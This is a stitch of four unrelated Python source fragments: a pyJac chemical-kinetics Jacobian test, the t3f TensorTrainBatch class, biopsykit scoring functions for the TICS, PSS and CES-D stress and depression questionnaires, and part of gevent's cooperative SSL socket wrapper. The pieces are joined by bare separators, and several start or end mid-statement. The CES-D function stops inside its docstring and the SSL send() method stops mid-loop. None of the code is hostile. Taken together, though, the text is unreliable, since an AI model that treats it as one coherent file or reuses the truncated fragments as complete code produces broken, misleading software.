self.kernel_args['jac'] = out_vals[-1][0].copy(
order=self.current_order)
# and get mask
comp = self._get_compare(fd_jac)
kc = [kernel_call('dci_sri_dnj', comp.ref_answer, check=False,
strict_name_match=True, **args),
kernel_call('dci_sri_dnj_ns', comp.ref_answer,
compare_mask=[comp],
compare_axis=comp.compare_axis, chain=_chainer,
strict_name_match=True, allow_skip=True,
other_compare=self.nan_compare, rtol=5e-4, **args)]
return self._generic_jac_tester(dci_sri_dnj, kc)
def __get_troe_params(self, namestore):
troe_args = {'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True)}
runner = kernel_runner(
get_troe_kernel, self.store.test_size, troe_args)
opts = loopy_options(order='C', lang='c')
Fcent, Atroe, Btroe = [runner(
opts, namestore, self.store.test_size)[x] for x in
['Fcent', 'Atroe', 'Btroe']]
return Fcent, Atroe, Btroe
@attr('long')
@with_check_inds(check_inds={
# find non-NaN Troe entries for testing
# NaN entries will be handled by :func:`nan_compare`
0: lambda self: np.where(np.all(
self.store.ref_Pr[:, self.store.troe_to_pr_map] != 0.0, axis=1))[0],
1: lambda self: self.__get_dci_check(
lambda rxn: isinstance(rxn, ct.FalloffReaction) and
rxn.falloff.type == 'Troe'),
2: lambda self: 2 + np.arange(self.store.gas.n_species - 1)
})
def test_dci_troe_dnj(self):
# test conp
namestore, rate_info = self._make_namestore(True)
ad_opts = namestore.loopy_opts
# set up arguements
allint = {'net': rate_info['net']['allint']}
# get our form of rop_fwd / rop_rev
fwd_removed, rev_removed = self.__get_removed()
# setup arguements
# create the editor
edit = editor(
namestore.n_arr, namestore.n_dot, self.store.test_size,
order=ad_opts.order, skip_on_missing=get_troe_kernel)
if not rate_info['fall']['troe']['num']:
raise SkipTest('No Troe reactions in mechanism {}'.format(
self.store.gas.name))
# get kf / kf_fall
kf, kf_fall = self.__get_kf_and_fall()
Fcent, Atroe, Btroe = self.__get_troe_params(namestore)
args = {
'pres_mod': lambda x: np.zeros_like(
self.store.ref_pres_mod, order=x),
'thd_conc': lambda x: np.array(
self.store.ref_thd, order=x, copy=True),
'Fi': lambda x: np.zeros_like(self.store.ref_Fall, order=x),
'Pr': lambda x: np.array(self.store.ref_Pr, order=x, copy=True),
'phi': lambda x: np.array(self.store.phi_cp, order=x, copy=True),
'P_arr': lambda x: np.array(self.store.P, order=x, copy=True),
'conc': lambda x: np.zeros_like(self.store.concs, order=x),
'wdot': lambda x: np.zeros_like(self.store.species_rates, order=x),
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'rop_net': lambda x: np.zeros_like(self.store.rxn_rates, order=x),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'Atroe': lambda x: np.zeros_like(Atroe, order=x),
'Btroe': lambda x: np.zeros_like(Btroe, order=x),
'Fcent': lambda x: np.zeros_like(Fcent, order=x)
}
# obtain the finite difference jacobian
kc = kernel_call('dci_sri_nj', [None], **args)
fd_jac = self._get_jacobian(
get_molar_rates, kc, edit, ad_opts, True,
extra_funcs=[get_concentrations, get_thd_body_concs,
get_reduced_pressure_kernel, get_troe_kernel,
get_rxn_pres_mod, get_rop_net, get_spec_rates],
do_not_set=[namestore.conc_arr, namestore.Fi, namestore.Atroe,
namestore.Btroe, namestore.Fcent, namestore.thd_conc],
allint=allint)
# setup args
args = {
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'Fi': lambda x: np.array(
self.store.ref_Fall, order=x, copy=True),
| |
import numpy as np
import tensorflow as tf
from t3f.tensor_train_base import TensorTrainBase
from t3f.tensor_train import TensorTrain
from t3f import shapes
class TensorTrainBatch(TensorTrainBase):
"""Represents a batch of Tensor Train objects (TT-tensors or TT-matrices).
t3f represents a Tensor Train object as a tuple of TT-cores.
"""
def __init__(self, tt_cores, shape=None, tt_ranks=None, batch_size=None,
convert_to_tensors=True):
"""Creates a `TensorTrainBatch`.
Args:
tt_cores: A tuple of 4d or 5d tensor-like objects of shape
`[batch_size, r_k-1, n_k, r_k]` or
`[batch_size, r_k-1, n_k, m_k, r_k]`
Tensor-like can be numpy array, tf.Tensor, of tf.Variable
batch_size: number of elements in the batch. If None, tries to infer from
the TT-cores (not always possible even if it should be, e.g. if ranks
are unknown, than the whole shape of a core can be unknown).
shape: Shape of the underlying tensor. If None, tries to infer from the
TT-cores.
tt_ranks: a TensorShape of length d+1 (d is the dimensionality of
the underlying tensor). The first and the last ranks are assumed to
equal to 1. If None, tries to infer the ranks from the cores.
convert_to_tensors: bool, if True than convert each element of the
tt_cores tuple into a tf.Tensor (e.g. to initialize from np.array)
Returns:
A `TensorTrainBatch`.
Raises:
ValueError if the provided TT-cores are not valid or inconsistent with
the provided shape.
"""
tt_cores = list(tt_cores)
if convert_to_tensors:
# TODO: what does this namescope do?
with tf.name_scope("TensorTrainBatch", tt_cores):
for i in range(len(tt_cores)):
name = "core%d" % i
tt_cores[i] = tf.convert_to_tensor(tt_cores[i], name=name)
if not _are_batch_tt_cores_valid(tt_cores, shape, tt_ranks, batch_size):
raise ValueError('The tt_cores provided to TensorTrainBatch constructor '
'are not valid, have different dtypes, or are '
'inconsistent with the provided batch_size, shape, or '
'TT-ranks.')
self._tt_cores = tuple(tt_cores)
if batch_size is None:
self._batch_size = tt_cores[0].get_shape()[0].value
else:
self._batch_size = batch_size
self._raw_shape = shapes.clean_raw_shape(shape)
if self._raw_shape is None:
self._raw_shape = _infer_batch_raw_shape(self._tt_cores)
self._tt_ranks = None if tt_ranks is None else tf.TensorShape(tt_ranks)
if self._tt_ranks is None:
self._tt_ranks = _infer_batch_tt_ranks(self._tt_cores)
def get_shape(self):
"""Get the `TensorShape` representing the shape of the dense tensor.
The first dimension is the batch_size.
Returns:
A `TensorShape` object.
"""
shape = TensorTrainBase.get_shape(self)
return tf.TensorShape(np.hstack((self.batch_size, shape)))
@property
def tt_cores(self):
"""A tuple of TT-cores.
Returns:
A tuple of 4d or 5d tensors shape
`[batch_size, r_k-1, n_k, r_k]`
or
`[batch_size, r_k-1, n_k, m_k, r_k]`
"""
return self._tt_cores
@property
def batch_size(self):
"""The number of elements or None if not known."""
return self._batch_size
@property
def left_tt_rank_dim(self):
"""The dimension of the left TT-rank in each TT-core."""
return 1
@property
def right_tt_rank_dim(self):
"""The dimension of the right TT-rank in each TT-core."""
if self.is_tt_matrix():
# The dimensions of each TT-core are
# [batch_idx, left_rank, n, m, right_rank]
return 4
else:
# The dimensions of each TT-core are
# [batch_idx, left_rank, n, right_rank]
return 3
def __str__(self):
"""A string describing the TensorTrainBatch, its TT-rank and shape."""
shape = self.get_shape()
tt_ranks = self.get_tt_ranks()
if self.batch_size is None:
batch_size_str = '(?)'
else:
batch_size_str = str(self.batch_size)
if self.is_tt_matrix():
raw_shape = self.get_raw_shape()
type_str = 'TT-matrix variables' if self.is_variable() else 'TT-matrices'
return "A %s element batch of %s of size %d x %d, underlying tensor " \
"shape: %s x %s, TT-ranks: %s" % (batch_size_str, type_str,
shape[1], shape[2],
raw_shape[0], raw_shape[1],
tt_ranks)
else:
if self.is_variable():
type_str = 'Tensor Train variables'
else:
type_str = 'Tensor Trains'
return "A %s element batch of %s of shape %s, TT-ranks: %s" % \
(batch_size_str, type_str, shape[1:], tt_ranks)
@staticmethod
def _do_collapse_dim(slice_spec):
# Returns true if slice_spec is specified exactly and we want to collapse
# the corresponding axis, i.e. return an object with less dims. To be used
# in indexing functions.
# If its a actual slice, nothing to collapse. Otherwise (a number or
# a tf.Tensor) want to collapse.
return not isinstance(slice_spec, slice)
def _batch_dim_getitem(self, element_spec):
"""__getitem__ when provided only one (batch) index.
Examples:
a[1]
a[1:3]
"""
# This object index is specified exactly and we want to collapse the
# batch_size axis, i.e. return a TensorTrain instead of a TensorTrainBatch.
do_collapse_batch_dim = self._do_collapse_dim(element_spec)
new_tt_cores = []
for core_idx in range(self.ndims()):
curr_core = self.tt_cores[core_idx]
if self.is_tt_matrix():
new_tt_cores.append(curr_core[element_spec, :, :, :, :])
else:
new_tt_cores.append(curr_core[element_spec, :, :, :])
if do_collapse_batch_dim:
# This index is specified exactly and we want to collapse the batch_size
# axis, i.e. return a TensorTrain instead of a TensorTrainBatch.
return TensorTrain(new_tt_cores, self.get_raw_shape(),
self.get_tt_ranks())
else:
batch_size = new_tt_cores[0].get_shape()[0].value
return TensorTrainBatch(new_tt_cores, self.get_raw_shape(),
self.get_tt_ranks(), batch_size)
def _full_getitem(self, slice_spec):
"""__getitem__ when provided full index of length ndims + 1.
Examples:
a = t3f.random_tensor_batch((2, 3, 4), batch_size=5)
a[:3, 1:2, 4, :]
"""
if len(slice_spec) != self.ndims() + 1:
raise ValueError('Expected %d indices, got %d' % (self.ndims() + 1,
len(slice_spec)))
# This object index is specified exactly and we want to collapse the
# batch_size axis, i.e. return a TensorTrain instead of a TensorTrainBatch.
do_collapse_batch_dim = self._do_collapse_dim(slice_spec[0])
remainder = None
new_tt_cores = []
for core_idx in range(self.ndims()):
curr_core = self.tt_cores[core_idx]
if self.is_tt_matrix():
raise NotImplementedError
else:
sliced_core = curr_core[slice_spec[0], :, slice_spec[core_idx + 1], :]
do_collapse_curr_dim = self._do_collapse_dim(slice_spec[core_idx + 1])
if do_collapse_curr_dim:
# This index is specified exactly and we want to collapse this axis.
if remainder is None:
remainder = sliced_core
else:
if do_collapse_batch_dim:
remainder = tf.einsum('ab,bd->ad', remainder, sliced_core)
else:
remainder = tf.einsum('oab,obd->oad', remainder, sliced_core)
else:
if remainder is not None:
# Add reminder from the previous collapsed cores to the current
# core.
if do_collapse_batch_dim:
sliced_core = tf.einsum('ab,bid->aid', remainder, sliced_core)
else:
sliced_core = tf.einsum('oab,obid->oaid', remainder,
sliced_core)
remainder = None
new_tt_cores.append(sliced_core)
if remainder is not None:
# The reminder obtained from collapsing the last cores.
if do_collapse_batch_dim:
new_tt_cores[-1] = tf.einsum('aib,bd->aid', new_tt_cores[-1],
remainder)
else:
new_tt_cores[-1] = tf.einsum('oaib,obd->oaid', new_tt_cores[-1],
remainder)
remainder = None
# TODO: infer the output ranks and shape.
if do_collapse_batch_dim:
return TensorTrain(new_tt_cores)
else:
return TensorTrainBatch(new_tt_cores)
def __getitem__(self, slice_spec):
"""Basic indexing, returns a `TensorTrainBatch` with the specified region.
Examples:
>>> a = t3f.random_tensor_batch((2, 3, 4), batch_size=5)
>>> a[1:3, :, :, :]
is a 3D TensorTrainBatch 2 x 3 x 4 with batch_size = 2.
>>> a[1:3]
the same as above, a 3D TensorTrainBatch 2 x 3 x 4 with batch_size = 2.
>>> a[1, :, :, :]
is a 3D TensorTrain 2 x 3 x 4.
>>> a[1]
the same as above, a 3D TensorTrain 2 x 3 x 4.
>>> a[1:3, :, 1, :]
is a 2D TensorTrainBatch 2 x 4 with batch_size = 2.
>>> a[1, :, 1, :]
is a 2D TensorTrain 2 x 4.
Returns:
`TensorTrainBatch` or `TensorTrain` depending on whether the first
(batch) dim was specified as a range or as a number.
"""
try:
slice_only_batch_dim = len(slice_spec) == 1
except TypeError:
# The argument is not iterable, so it's a single slice, or a number, or a
# tf.Tensor with a number.
slice_only_batch_dim = True
if slice_only_batch_dim:
# Indexing only for the batch_size axis, e.g. a[1:3].
return self._batch_dim_getitem(slice_spec)
elif len(slice_spec) == self.ndims() + 1:
return self._full_getitem(slice_spec)
else:
raise ValueError('TensorTrainBatch.__getitem__: wrong number of '
'dimensions, expected 1 or %d, got %d' %
(self.ndims() + 1, len(slice_spec)))
def _are_batch_tt_cores_valid(tt_cores, shape, tt_ranks, batch_size):
"""Check if dimensions of the TT-cores are consistent and the dtypes coincide.
Args:
tt_cores: a tuple of `Tensor` objects
shape: An np.array, a tf.TensorShape (for tensors), a tuple of
tf.TensorShapes (for TT-matrices or tensors), or None
tt_ranks: An np.array or a tf.TensorShape of length len(tt_cores)+1.
batch_size: a number or None
Returns:
boolean, True if the dimensions and dtypes are consistent.
"""
shape = shapes.clean_raw_shape(shape)
num_dims = len(tt_cores)
for core_idx in range(1, num_dims):
if tt_cores[core_idx].dtype != tt_cores[0].dtype:
return False
try:
for core_idx in range(num_dims):
curr_core_shape = tt_cores[core_idx].get_shape()
if len(curr_core_shape) != len(tt_cores[0].get_shape()):
# Shapes are inconsistent.
return False
if batch_size is not None and curr_core_shape[0].value is not None:
if curr_core_shape[0].value != batch_size:
# The TT-cores are not aligned with the given batch_size.
return False
if shape is not None:
for i in range(len(shape)):
if curr_core_shape[i + 2] != shape[i][core_idx]:
# The TT-cores are not aligned with the given shape.
return False
if core_idx >= 1:
prev_core_shape = tt_cores[core_idx - 1].get_shape()
| |
are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
TICS_L score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something else than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns do not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
Examples
--------
>>> from biopsykit.questionnaires import tics_s
>>> # compute only a subset of subscales; questionnaire items additionally have custom indices
>>> subscales = {
>>> 'WorkOverload': [1, 2, 3],
>>> 'SocialOverload': [4, 5, 6],
>>> }
>>> tics_s_result = tics_s(data, subscales=subscales)
References
----------
<NAME>., <NAME>., & <NAME>. (2004). Trierer Inventar zum chronischen Stress: TICS. *Hogrefe*.
"""
score_name = "TICS_L"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 57)
subscales = {
"WorkOverload": [1, 4, 17, 27, 38, 44, 50, 54], # Arbeitsüberlastung
"SocialOverload": [7, 19, 28, 39, 49, 57], # Soziale Überlastung
"PressureToPerform": [8, 12, 14, 22, 23, 30, 32, 40, 43], # Erfolgsdruck
"WorkDiscontent": [5, 10, 13, 21, 37, 41, 48, 53], # Unzufriedenheit mit der Arbeit
"DemandsWork": [3, 20, 24, 35, 47, 55], # Überforderung bei der Arbeit
"LackSocialRec": [2, 18, 31, 46], # Mangel an sozialer Anerkennung
"SocialTension": [6, 15, 26, 33, 45, 52], # Soziale Spannungen
"SocialIsolation": [11, 29, 34, 42, 51, 56], # Soziale Isolation
"ChronicWorry": [9, 16, 25, 36], # Chronische Besorgnis
}
_assert_value_range(data, score_range)
tics_data = _compute_questionnaire_subscales(data, score_name, subscales)
if len(data.columns) == 57:
# compute total score if all columns are present
tics_data[score_name] = data.sum(axis=1)
return pd.DataFrame(tics_data, index=data.index)
def tics_s(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
subscales: Optional[Dict[str, Sequence[Union[str, int]]]] = None,
) -> pd.DataFrame:
"""Compute the **Trier Inventory for Chronic Stress (Short Version) (TICS_S)**.
The TICS assesses frequency of various types of stressful experiences in the past 3 months.
It consists of the subscales (the name in the brackets indicate the name in the returned dataframe),
with the item indices (count-by-one, i.e., the first question has the index 1!):
* ``Work Overload``: [1, 3, 21]
* ``Social Overload``: [11, 18, 28]
* ``Excessive Demands at Work``: [12, 16, 27]
* ``Lack of Social Recognition``: [2, 20, 23]
* ``Work Discontent``: [8, 13, 24]
* ``Social Tension``: [4, 9, 26]
* ``Performance Pressure at Work``: [5, 14, 29]
* ``Performance Pressure in Social Interactions``: [6, 15, 22]
* ``Social Isolation``: [19, 25, 30]
* ``Worry Propensity``: [7, 10, 17]
.. note::
This implementation assumes a score range of [0, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
.. warning::
Column indices in ``subscales`` are assumed to start at 1 (instead of 0) to avoid confusion with
questionnaire item columns, which typically also start with index 1!
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
TICS_S score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something else than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns do not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
Examples
--------
>>> from biopsykit.questionnaires import tics_s
>>> # compute only a subset of subscales; questionnaire items additionally have custom indices
>>> subscales = {
>>> 'WorkOverload': [1, 2, 3],
>>> 'SocialOverload': [4, 5, 6],
>>> }
>>> tics_s_result = tics_s(data, subscales=subscales)
References
----------
<NAME>., <NAME>., & <NAME>. (2004). Trierer Inventar zum chronischen Stress: TICS. *Hogrefe*.
"""
score_name = "TICS_S"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 30)
subscales = {
"WorkOverload": [1, 3, 21],
"SocialOverload": [11, 18, 28],
"PressureToPerform": [5, 14, 29],
"WorkDiscontent": [8, 13, 24],
"DemandsWork": [12, 16, 27],
"PressureSocial": [6, 15, 22],
"LackSocialRec": [2, 20, 23],
"SocialTension": [4, 9, 26],
"SocialIsolation": [19, 25, 30],
"ChronicWorry": [7, 10, 17],
}
_assert_value_range(data, score_range)
tics_data = _compute_questionnaire_subscales(data, score_name, subscales)
if len(data.columns) == 30:
# compute total score if all columns are present
tics_data[score_name] = data.sum(axis=1)
return pd.DataFrame(tics_data, index=data.index)
def pss(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
subscales: Optional[Dict[str, Sequence[Union[str, int]]]] = None,
) -> pd.DataFrame:
"""Compute the **Perceived Stress Scale (PSS)**.
The PSS is a widely used self-report questionnaire with adequate reliability and validity asking
about how stressful a person has found his/her life during the previous month.
The PSS consists of the subscales with the item indices
(count-by-one, i.e., the first question has the index 1!):
* Perceived Helplessness (Hilflosigkeit - ``Helpness``): [1, 2, 3, 6, 9, 10]
* Perceived Self-Efficacy (Selbstwirksamkeit - ``SelfEff``): [4, 5, 7, 8]
.. note::
This implementation assumes a score range of [0, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
PSS score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something else than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns do not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., & <NAME>. (1983). A Global Measure of Perceived Stress.
*Journal of Health and Social Behavior*, 24(4), 385. https://doi.org/10.2307/2136404
"""
score_name = "PSS"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 10)
subscales = {"Helpless": [1, 2, 3, 6, 9, 10], "SelfEff": [4, 5, 7, 8]}
_assert_value_range(data, score_range)
# Reverse scores 4, 5, 7, 8
data = invert(data, cols=to_idx([4, 5, 7, 8]), score_range=score_range)
pss_data = _compute_questionnaire_subscales(data, score_name, subscales)
pss_data["{}_Total".format(score_name)] = data.sum(axis=1)
return pd.DataFrame(pss_data, index=data.index)
def cesd(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Center for Epidemiological Studies Depression Scale (CES-D)**.
The CES-D asks about depressive symptoms experienced over the past week.
Higher scores indicate greater depressive symptoms.
.. note::
This implementation assumes a score range of [0, 3].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are | |
<reponame>mrkevinlin/eighty<filename>appengine/lib/gevent/_sslgte279.py
# Wrapper module for _ssl. Written by <NAME>.
# Ported to gevent by <NAME>.
"""SSL wrapper for socket objects.
For the documentation, refer to :mod:`ssl` module manual.
This module implements cooperative SSL socket wrappers.
"""
from __future__ import absolute_import
import ssl as __ssl__
_ssl = __ssl__._ssl
import errno
from gevent.socket import socket, timeout_default
from gevent.socket import error as socket_error
from gevent.hub import PYPY
__implements__ = ['SSLContext',
'SSLSocket',
'wrap_socket',
'get_server_certificate',
'create_default_context',
'_create_unverified_context',
'_create_default_https_context',
'_create_stdlib_context']
__imports__ = []
# Import all symbols from Python's ssl.py, except those that we are implementing
# and "private" symbols.
for name in dir(__ssl__):
if name in __implements__:
continue
if name.startswith('__'):
continue
value = getattr(__ssl__, name)
globals()[name] = value
__imports__.append(name)
del name, value
__all__ = __implements__ + __imports__
orig_SSLContext = __ssl__.SSLContext
class SSLContext(orig_SSLContext):
def wrap_socket(self, sock, server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
server_hostname=None):
return SSLSocket(sock=sock, server_side=server_side,
do_handshake_on_connect=do_handshake_on_connect,
suppress_ragged_eofs=suppress_ragged_eofs,
server_hostname=server_hostname,
_context=self)
def create_default_context(purpose=Purpose.SERVER_AUTH, cafile=None,
capath=None, cadata=None):
"""Create a SSLContext object with default settings.
NOTE: The protocol and settings may change anytime without prior
deprecation. The values represent a fair balance between maximum
compatibility and security.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(PROTOCOL_SSLv23)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
# disable compression to prevent CRIME attacks (OpenSSL 1.0+)
context.options |= getattr(_ssl, "OP_NO_COMPRESSION", 0)
if purpose == Purpose.SERVER_AUTH:
# verify certs and host name in client mode
context.verify_mode = CERT_REQUIRED
context.check_hostname = True
elif purpose == Purpose.CLIENT_AUTH:
# Prefer the server's ciphers by default so that we get stronger
# encryption
context.options |= getattr(_ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
# Use single use keys in order to improve forward secrecy
context.options |= getattr(_ssl, "OP_SINGLE_DH_USE", 0)
context.options |= getattr(_ssl, "OP_SINGLE_ECDH_USE", 0)
# disallow ciphers with known vulnerabilities
context.set_ciphers(_RESTRICTED_SERVER_CIPHERS)
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
def _create_unverified_context(protocol=PROTOCOL_SSLv23, cert_reqs=None,
check_hostname=False, purpose=Purpose.SERVER_AUTH,
certfile=None, keyfile=None,
cafile=None, capath=None, cadata=None):
"""Create a SSLContext object for Python stdlib modules
All Python stdlib modules shall use this function to create SSLContext
objects in order to keep common settings in one place. The configuration
is less restrict than create_default_context()'s to increase backward
compatibility.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(protocol)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
if cert_reqs is not None:
context.verify_mode = cert_reqs
context.check_hostname = check_hostname
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile or keyfile:
context.load_cert_chain(certfile, keyfile)
# load CA root certs
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
# Used by http.client if no context is explicitly passed.
_create_default_https_context = create_default_context
# Backwards compatibility alias, even though it's not a public name.
_create_stdlib_context = _create_unverified_context
class SSLSocket(socket):
def __init__(self, sock=None, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None,
suppress_ragged_eofs=True, npn_protocols=None, ciphers=None,
server_hostname=None,
_context=None):
self._makefile_refs = 0
if _context:
self._context = _context
else:
if server_side and not certfile:
raise ValueError("certfile must be specified for server-side "
"operations")
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile and not keyfile:
keyfile = certfile
self._context = SSLContext(ssl_version)
self._context.verify_mode = cert_reqs
if ca_certs:
self._context.load_verify_locations(ca_certs)
if certfile:
self._context.load_cert_chain(certfile, keyfile)
if npn_protocols:
self._context.set_npn_protocols(npn_protocols)
if ciphers:
self._context.set_ciphers(ciphers)
self.keyfile = keyfile
self.certfile = certfile
self.cert_reqs = cert_reqs
self.ssl_version = ssl_version
self.ca_certs = ca_certs
self.ciphers = ciphers
# Can't use sock.type as other flags (such as SOCK_NONBLOCK) get
# mixed in.
if sock.getsockopt(SOL_SOCKET, SO_TYPE) != SOCK_STREAM:
raise NotImplementedError("only stream sockets are supported")
socket.__init__(self, _sock=sock._sock)
# The initializer for socket overrides the methods send(), recv(), etc.
# in the instancce, which we don't need -- but we want to provide the
# methods defined in SSLSocket.
for attr in _delegate_methods:
try:
delattr(self, attr)
except AttributeError:
pass
if server_side and server_hostname:
raise ValueError("server_hostname can only be specified "
"in client mode")
if self._context.check_hostname and not server_hostname:
raise ValueError("check_hostname requires server_hostname")
self.server_side = server_side
self.server_hostname = server_hostname
self.do_handshake_on_connect = do_handshake_on_connect
self.suppress_ragged_eofs = suppress_ragged_eofs
self.settimeout(sock.gettimeout())
# See if we are connected
try:
self.getpeername()
except socket_error, e:
if e.errno != errno.ENOTCONN:
raise
connected = False
else:
connected = True
self._closed = False
self._sslobj = None
self._connected = connected
if connected:
# create the SSL object
try:
self._sslobj = self._context._wrap_socket(self._sock, server_side,
server_hostname, ssl_sock=self)
if do_handshake_on_connect:
timeout = self.gettimeout()
if timeout == 0.0:
# non-blocking
raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
self.do_handshake()
except socket_error as x:
self.close()
raise x
@property
def context(self):
return self._context
@context.setter
def context(self, ctx):
self._context = ctx
self._sslobj.context = ctx
def dup(self):
raise NotImplemented("Can't dup() %s instances" %
self.__class__.__name__)
def _checkClosed(self, msg=None):
# raise an exception here if you wish to check for spurious closes
pass
def _check_connected(self):
if not self._connected:
# getpeername() will raise ENOTCONN if the socket is really
# not connected; note that we can be connected even without
# _connected being set, e.g. if connect() first returned
# EAGAIN.
self.getpeername()
def read(self, len=0, buffer=None):
"""Read up to LEN bytes and return them.
Return zero-length string on EOF."""
while True:
try:
if buffer is not None:
return self._sslobj.read(len, buffer)
else:
return self._sslobj.read(len or 1024)
except SSLWantReadError:
if self.timeout == 0.0:
raise
self._wait(self._read_event, timeout_exc=_SSLErrorReadTimeout)
except SSLWantWriteError:
if self.timeout == 0.0:
raise
# note: using _SSLErrorReadTimeout rather than _SSLErrorWriteTimeout below is intentional
self._wait(self._write_event, timeout_exc=_SSLErrorReadTimeout)
except SSLError as ex:
if ex.args[0] == SSL_ERROR_EOF and self.suppress_ragged_eofs:
if buffer is not None:
return 0
else:
return b''
else:
raise
def write(self, data):
"""Write DATA to the underlying SSL channel. Returns
number of bytes of DATA actually transmitted."""
while True:
try:
return self._sslobj.write(data)
except SSLError as ex:
if ex.args[0] == SSL_ERROR_WANT_READ:
if self.timeout == 0.0:
raise
self._wait(self._read_event, timeout_exc=_SSLErrorWriteTimeout)
elif ex.args[0] == SSL_ERROR_WANT_WRITE:
if self.timeout == 0.0:
raise
self._wait(self._write_event, timeout_exc=_SSLErrorWriteTimeout)
else:
raise
def getpeercert(self, binary_form=False):
"""Returns a formatted version of the data in the
certificate provided by the other end of the SSL channel.
Return None if no certificate was provided, {} if a
certificate was provided, but not validated."""
self._checkClosed()
self._check_connected()
return self._sslobj.peer_certificate(binary_form)
def selected_npn_protocol(self):
self._checkClosed()
if not self._sslobj or not _ssl.HAS_NPN:
return None
else:
return self._sslobj.selected_npn_protocol()
def cipher(self):
self._checkClosed()
if not self._sslobj:
return None
else:
return self._sslobj.cipher()
def compression(self):
self._checkClosed()
if not self._sslobj:
return None
else:
return self._sslobj.compression()
def send(self, data, flags=0, timeout=timeout_default):
self._checkClosed()
if timeout is timeout_default:
timeout = self.timeout
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to send() on %s" %
self.__class__)
while True:
try:
return self._sslobj.write(data)
